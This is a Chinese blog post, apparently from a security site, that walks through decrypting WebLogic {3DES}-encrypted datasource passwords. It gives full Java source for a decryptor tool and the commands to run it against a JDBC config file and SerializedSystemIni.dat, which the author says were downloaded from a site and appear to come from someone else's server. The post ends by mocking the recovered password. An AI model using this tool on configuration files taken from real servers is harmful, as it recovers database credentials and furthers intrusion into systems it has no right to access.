Weblogic的3DES解密
首先下载安装包:http://download2.bea.com/pub/platform/92/server920_win32.exe(使用迅雷下载)
为了不出现一些问题所以使用Windows的安装包了,版本是跟站点一致的。
数据源配置文件HKS***-****-jdbc.xml和SerializedSystemIni.dat已经下载到了本地,等了一个多小时将安装包拖下来了,接下来就是安装:
等待了一段时间安装完毕,将配置文件放置"C:\bea\weblogic92\samples\domains\wl_server\config\jdbc"下,密钥文件放置"C:\bea\weblogic92\samples\domains\wl_server\security",然后使用下面的WebLogicDecryptor.class破解之,WebLogicDecryptor.java的源码如下:
import java.util.*; import java.io.*; import javax.xml.parsers.*; import javax.xml.xpath.*; import org.w3c.dom.*; import weblogic.security.internal.*; // requires weblogic.jar in the class path import weblogic.security.internal.encryption.*; public class WebLogicDecryptor { private static final String PREFIX = "{3DES}"; private static final String XPATH_EXPRESSION = "//node()[starts-with(text(), '" + PREFIX + "')] | //@*[starts-with(., '" + PREFIX + "')]"; private static ClearOrEncryptedService ces; public static void main(String[] args) throws Exception { if (args.length < 2) { throw new Exception("Usage: [domainDir] [configFile]"); } ces = new ClearOrEncryptedService( SerializedSystemIni.getEncryptionService(new File(args[0]) .getAbsolutePath())); File file = new File(args[1]); if (file.getName().endsWith(".xml")) { processXml(file); } else if (file.getName().endsWith(".properties")) { processProperties(file); } } private static void processXml(File file) throws Exception { Document doc = DocumentBuilderFactory.newInstance() .newDocumentBuilder().parse(file); XPathExpression expr = XPathFactory.newInstance().newXPath() .compile(XPATH_EXPRESSION); NodeList nodes = (NodeList) expr.evaluate(doc, XPathConstants.NODESET); for (int i = 0; i < nodes.getLength(); i++) { Node node = nodes.item(i); print(node.getNodeName(), node.getTextContent()); } } private static void processProperties(File file) throws Exception { Properties properties = new Properties(); properties.load(new FileInputStream(file)); for (Map.Entry p : properties.entrySet()) { if (p.getValue().toString().startsWith(PREFIX)) { print(p.getKey(), p.getValue()); } } } private static void print(Object attributeName, Object encrypted) { System.out.println("Node name: " + attributeName); System.out.println("Encrypted: " + encrypted); System.out.println("Decrypted: " + ces.decrypt((String) encrypted) + "\n"); } }首先打开CMD,然后pushd到"C:\bea\weblogic92\samples\domains\wl_server"目录中,之后导入环境变量"setExamplesEnv.cmd",截图如下:
然后编译WebLogicDecryptor.java(可以到这里下载:http://up.2cto.com/2013/0501/20130501110556618.rar
),编译完毕执行下面的命令即可:
java WebLogicDecryptor C:\bea\weblogic92\samples\domains\wl_server C:\bea\weblogic92\samples\domains\wl_server\config\jdbc\HKS516-8106-jdbc.xml
命令的格式:Usage: [domainDir] [configFile]
最后结果上张图:
密码很坑爹,鉴定完毕。
上一篇: 东京大学加密招生海报解密过程